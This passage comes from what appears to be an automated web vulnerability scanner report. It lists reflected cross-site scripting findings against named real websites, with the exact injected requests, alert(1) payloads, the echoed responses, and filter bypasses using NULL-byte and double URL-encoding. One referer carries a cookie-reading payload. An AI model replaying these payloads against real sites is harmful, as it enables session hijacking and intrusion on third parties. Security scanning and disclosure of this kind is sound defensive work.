<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript">var s_furl = "/click?98685"-alert(1)-"8e8d2566d57=1";</script>
...[SNIP]...

3.130. http://www.wi-fihotspotlist.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wi-fihotspotlist.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 819ed--><script>alert(1)</script>bc87dd2bdd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?819ed--><script>alert(1)</script>bc87dd2bdd0=1 HTTP/1.1
Host: www.wi-fihotspotlist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:55 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Mon, 28 Feb 2011 13:39:55 GMT
Connection: close
Content-Type: text/html
Content-Length: 59069

<html>
<head>
<title> Wi-FiHotSpotList.com, a directory of public hot spots for finding Wi-Fi
wireless Internet access network nodes</title>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<!-- house_ribbon: Missing QUAD ads for page_type: other on path www.wi-fihotspotlist.com with position U
url: /?819ed--><script>alert(1)</script>bc87dd2bdd0=1 -->
...[SNIP]...

3.131. http://www.wifesbank.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wifesbank.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65a79"-alert(1)-"d1b418a3831 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?65a79"-alert(1)-"d1b418a3831=1 HTTP/1.1
Host: www.wifesbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:14 GMT
Server: Apache
Set-Cookie: from=noref; expires=Tue, 01 Mar 2011 13:39:14 GMT; path=/
Set-Cookie: lfrom=noref; expires=Tue, 01 Mar 2011 13:39:14 GMT; path=/
Set-Cookie: idcheck=1298900354; expires=Tue, 01 Mar 2011 13:39:14 GMT; path=/
Set-Cookie: index_page=1; expires=Tue, 01 Mar 2011 13:39:14 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 108057

<html>
<head>
<title>Free Mature and Milf Porn Pictures at WifesBank.com</title>
<meta name="description" content="WifesBank dedicated to sexy hot women over 30+ years old galleries, free mature an
...[SNIP]...
<!--
document.cookie = "stvisitor=noref|1|65a79"-alert(1)-"d1b418a3831=1; path=/;"
// -->
...[SNIP]...

3.132. http://www.worldmastiffforum.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.worldmastiffforum.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbf6e"><script>alert(1)</script>c2ada053f1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?cbf6e"><script>alert(1)</script>c2ada053f1b=1 HTTP/1.1
Host: www.worldmastiffforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 28 Feb 2011 13:39:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: hascookies=1; path=/; domain=.worldmastiffforum.com;
Expires: Nov, 8 1991 00:00:01 GMT
Cache-control: no-cache
P3P: CP='NOI DSP COR NID CURa TAIi OUR BUS INT PRE'; policyref='http://www.worldmastiffforum.com/w3c/p3p.xml';
Set-Cookie: newvisit=1298900348; path=/; domain=.worldmastiffforum.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;
Set-Cookie: lastvisit=1298900348; path=/; domain=.worldmastiffforum.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;
Vary: Accept-Encoding
Content-Length: 74533


       <html >
       <head>
       <link rel="alternate" type="application/rss+xml" title="Message Board RSS Feed" href="/external">
       
           <link rel="alternate" type="application/rss+xml" title="Message Board - -
...[SNIP]...
<input type="hidden" name="jump" value="http://www.worldmastiffforum.com/?cbf6e"><script>alert(1)</script>c2ada053f1b=1">
...[SNIP]...

3.133. http://www.wovencube.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wovencube.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %008d084'><script>alert(1)</script>e4f76638384 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d084'><script>alert(1)</script>e4f76638384 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /?%008d084'><script>alert(1)</script>e4f76638384=1 HTTP/1.1
Host: www.wovencube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 28 Feb 2011 13:39:04 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-Length: 4098
Connection: Close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <title>WovenCube.com P
...[SNIP]...
<form action='/?%008d084'><script>alert(1)</script>e4f76638384=1' method='post'>
...[SNIP]...

3.134. http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15' [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wwmt.com
Path:   /articles/calls-1387029-mubarak-friend.html97f15'

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload caa29%3balert(1)//b958698d1a5 was submitted in the REST URL parameter 2. This input was echoed as caa29;alert(1)//b958698d1a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/calls-1387029-mubarak-friend.html97f15'caa29%3balert(1)//b958698d1a5 HTTP/1.1
Host: www.wwmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:40:42 GMT
Server: Apache
Cache-Control: no-store, no-cache, max-age=600
Pragma: no-cache
Expires: Mon, 28 Feb 2011 13:50:42 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 89211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:pas="
...[SNIP]...
<script type="text/javascript">
       tweetmeme_url = 'http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15'caa29;alert(1)//b958698d1a5';
   </script>
...[SNIP]...

3.135. http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15' [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wwmt.com
Path:   /articles/calls-1387029-mubarak-friend.html97f15'

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139ab"><script>alert(1)</script>0681276c1f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/calls-1387029-mubarak-friend.html97f15'139ab"><script>alert(1)</script>0681276c1f5 HTTP/1.1
Host: www.wwmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:40:15 GMT
Server: Apache
Cache-Control: no-store, no-cache, max-age=600
Pragma: no-cache
Expires: Mon, 28 Feb 2011 13:50:15 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 89421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:pas="
...[SNIP]...
<meta property="og:url" content="http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15'139ab"><script>alert(1)</script>0681276c1f5"/>
...[SNIP]...

3.136. http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15' [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wwmt.com
Path:   /articles/calls-1387029-mubarak-friend.html97f15'

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbb1e"><script>alert(1)</script>a4ff7edd26e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/calls-1387029-mubarak-friend.html97f15'?dbb1e"><script>alert(1)</script>a4ff7edd26e=1 HTTP/1.1
Host: www.wwmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:27 GMT
Server: Apache
Cache-Control: no-store, no-cache, max-age=600
Pragma: no-cache
Expires: Mon, 28 Feb 2011 13:49:27 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 89094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:pas="
...[SNIP]...
<meta property="og:url" content="http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15'?dbb1e"><script>alert(1)</script>a4ff7edd26e=1"/>
...[SNIP]...

3.137. http://www.yasni.de/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yasni.de
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cab5b"><script>alert(1)</script>a8329170866 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?cab5b"><script>alert(1)</script>a8329170866=1 HTTP/1.1
Host: www.yasni.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:13 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=shr8ma08mdlhgi8i49uj7d9ue6kai8uu; expires=Mon, 28-Feb-2011 14:03:13 GMT; path=/; HttpOnly
X-hostname: bl06.yasni.de
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37092

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8"
...[SNIP]...
<a href="http://www.yasni.com/?cab5b"><script>alert(1)</script>a8329170866=1" id="region_selector_1">
...[SNIP]...

3.138. http://xhtml.co.il/he/page-700/jQuery [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhtml.co.il
Path:   /he/page-700/jQuery

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4875e'><script>alert(1)</script>fe07f366f0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /he/page-700/jQuery?4875e'><script>alert(1)</script>fe07f366f0d=1 HTTP/1.1
Host: xhtml.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:28 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.9
Pragma: public
Cache-Control: maxage=5184000
Expires: Fri, 29 Apr 2011 13:39:28 GMT
Set-Cookie: PHPSESSID=7949d667394eedf5da9a520aefd255ec; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 66032

<!DOCTYPE html>
<html lang="he"><head>
<title>jQuery - ...... ........ XHTML</title>
<meta name="description" content="jQuery - ...... ........ XHTML" />
<meta charset="utf-8">
<meta name="verify-v1"
...[SNIP]...
<link rel='index' title='jQuery' href='http://xhtml.co.il//he/page-700/jQuery?4875e'><script>alert(1)</script>fe07f366f0d=1' />
...[SNIP]...

3.139. http://xhtml.co.il/ru/page-1013/jQuery.browser [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhtml.co.il
Path:   /ru/page-1013/jQuery.browser

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4a704'><script>alert(1)</script>1075a16881 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ru/page-1013/jQuery.browser?4a704'><script>alert(1)</script>1075a16881=1 HTTP/1.1
Host: xhtml.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:33 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.9
Pragma: public
Cache-Control: maxage=5184000
Expires: Fri, 29 Apr 2011 13:39:33 GMT
Set-Cookie: PHPSESSID=7b4853fcafc30ca19b6627c146c060df; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 78411

<!DOCTYPE html>
<html lang="ru"><head>
<title>...................... jQuery/jQuery.browser - .......... XHTML</title>
<meta name="description" content="...................... jQuery/jQuery.browser - .
...[SNIP]...
<link rel='index' title='...................... jQuery/jQuery.browser' href='http://xhtml.co.il//ru/page-1013/jQuery.browser?4a704'><script>alert(1)</script>1075a16881=1' />
...[SNIP]...

3.140. http://ziggymedia.go2cloud.org/aff_c [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ziggymedia.go2cloud.org
Path:   /aff_c

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2909d"><script>alert(1)</script>fa825e2f9af was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /aff_c?offer_id=24&aff_id=1001&source=js_sound2909d"><script>alert(1)</script>fa825e2f9af&url_id=4 HTTP/1.1
Host: ziggymedia.go2cloud.org
Proxy-Connection: keep-alive
Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aff_ran_url_24=2; aff_session_24=4-102bc0dcefe04a1d46554d1de1f877-1001-24-2-0-0-0-US-3-_-_-_-_-_-_-173.193.214.243-20110228082415-http%3A%2F%2Fwww.acelacomm.com%2F%3Fepl%3Dw58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA-

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html
Date: Mon, 28 Feb 2011 13:25:22 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: nginx/0.9.3
Content-Length: 623
Connection: keep-alive

<html><head><style>body{background: white;} input {font-size:25px;} form{margin-top: 50px;}</style></head><body onload="document.getElementById('go').submit();"><center><form action="/aff_r" method="G
...[SNIP]...
<input type="hidden" name="url" value="http://weekly-prizes.com/?aff=154&subid=js_sound2909d"><script>alert(1)</script>fa825e2f9af&pop=0&sound=0&sid=1001" />
...[SNIP]...

3.141. http://ziggymedia.go2cloud.org/aff_r [aff_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ziggymedia.go2cloud.org
Path:   /aff_r

Issue detail

The value of the aff_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8f58d388472 was submitted in the aff_id parameter. This input was echoed as 53a8a"><script>alert(1)</script>8f58d388472 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /aff_r?offer_id=24&aff_id=100153a8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8f58d388472&url=http%3A%2F%2Fweekly-prizes.com%2F%3Faff%3D154%26subid%3D%26pop%3D0%26r%3D1%26sound%3D1%26sid%3D1001 HTTP/1.1
Host: ziggymedia.go2cloud.org
Proxy-Connection: keep-alive
Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aff_ran_url_24=2; aff_session_24=4-102bc0dcefe04a1d46554d1de1f877-1001-24-2-0-0-0-US-3-_-_-_-_-_-_-173.193.214.243-20110228082415-http%3A%2F%2Fwww.acelacomm.com%2F%3Fepl%3Dw58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA-

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html
Date: Mon, 28 Feb 2011 13:25:02 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: nginx/0.9.3
Content-Length: 619
Connection: keep-alive

<html><head><style>body{background: white;} input {font-size:25px;} form{margin-top: 50px;}</style></head><body onload="document.getElementById('go').submit();"><center><form action="/aff_r" method="G
...[SNIP]...
<input type="hidden" name="aff_id" value="100153a8a"><script>alert(1)</script>8f58d388472" />
...[SNIP]...

3.142. http://ziggymedia.go2cloud.org/aff_r [offer_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ziggymedia.go2cloud.org
Path:   /aff_r

Issue detail

The value of the offer_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14e7e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4005ce2169 was submitted in the offer_id parameter. This input was echoed as 14e7e"><script>alert(1)</script>b4005ce2169 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /aff_r?offer_id=2414e7e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4005ce2169&aff_id=1001&url=http%3A%2F%2Fweekly-prizes.com%2F%3Faff%3D154%26subid%3D%26pop%3D0%26r%3D1%26sound%3D1%26sid%3D1001 HTTP/1.1
Host: ziggymedia.go2cloud.org
Proxy-Connection: keep-alive
Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aff_ran_url_24=2; aff_session_24=4-102bc0dcefe04a1d46554d1de1f877-1001-24-2-0-0-0-US-3-_-_-_-_-_-_-173.193.214.243-20110228082415-http%3A%2F%2Fwww.acelacomm.com%2F%3Fepl%3Dw58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA-

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html
Date: Mon, 28 Feb 2011 13:24:55 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: nginx/0.9.3
Content-Length: 619
Connection: keep-alive

<html><head><style>body{background: white;} input {font-size:25px;} form{margin-top: 50px;}</style></head><body onload="document.getElementById('go').submit();"><center><form action="/aff_r" method="G
...[SNIP]...
<input type="hidden" name="offer_id" value="2414e7e"><script>alert(1)</script>b4005ce2169" />
...[SNIP]...

3.143. http://ziggymedia.go2cloud.org/aff_r [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ziggymedia.go2cloud.org
Path:   /aff_r

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e33e"><script>alert(1)</script>72b176da3b7 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /aff_r?offer_id=24&aff_id=1001&url=http%3A%2F%2Fweekly-prizes.com%2F%3Faff%3D154%26subid%3D%26pop%3D0%26r%3D1%26sound%3D1%26sid%3D10017e33e"><script>alert(1)</script>72b176da3b7 HTTP/1.1
Host: ziggymedia.go2cloud.org
Proxy-Connection: keep-alive
Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aff_ran_url_24=2; aff_session_24=4-102bc0dcefe04a1d46554d1de1f877-1001-24-2-0-0-0-US-3-_-_-_-_-_-_-173.193.214.243-20110228082415-http%3A%2F%2Fwww.acelacomm.com%2F%3Fepl%3Dw58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA-

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html
Date: Mon, 28 Feb 2011 13:25:06 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: nginx/0.9.3
Content-Length: 619
Connection: keep-alive

<html><head><style>body{background: white;} input {font-size:25px;} form{margin-top: 50px;}</style></head><body onload="document.getElementById('go').submit();"><center><form action="/aff_r" method="G
...[SNIP]...
<input type="hidden" name="url" value="http://weekly-prizes.com/?aff=154&subid=&pop=0&r=1&sound=1&sid=10017e33e"><script>alert(1)</script>72b176da3b7" />
...[SNIP]...

3.144. http://zjmps.com/click/ [a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://zjmps.com
Path:   /click/

Issue detail

The value of the a request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaffd"><script>alert(1)</script>4fa49262733 was submitted in the a parameter. This input was echoed as aaffd\\\"><script>alert(1)</script>4fa49262733 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /click/?a=154aaffd"><script>alert(1)</script>4fa49262733&o=518&c1=js_sound2909d\ HTTP/1.1
Host: zjmps.com
Proxy-Connection: keep-alive
Referer: http://weekly-prizes.com/?aff=154&subid=js_sound2909d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Efa825e2f9af&pop=0&sound=0&sid=1001
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

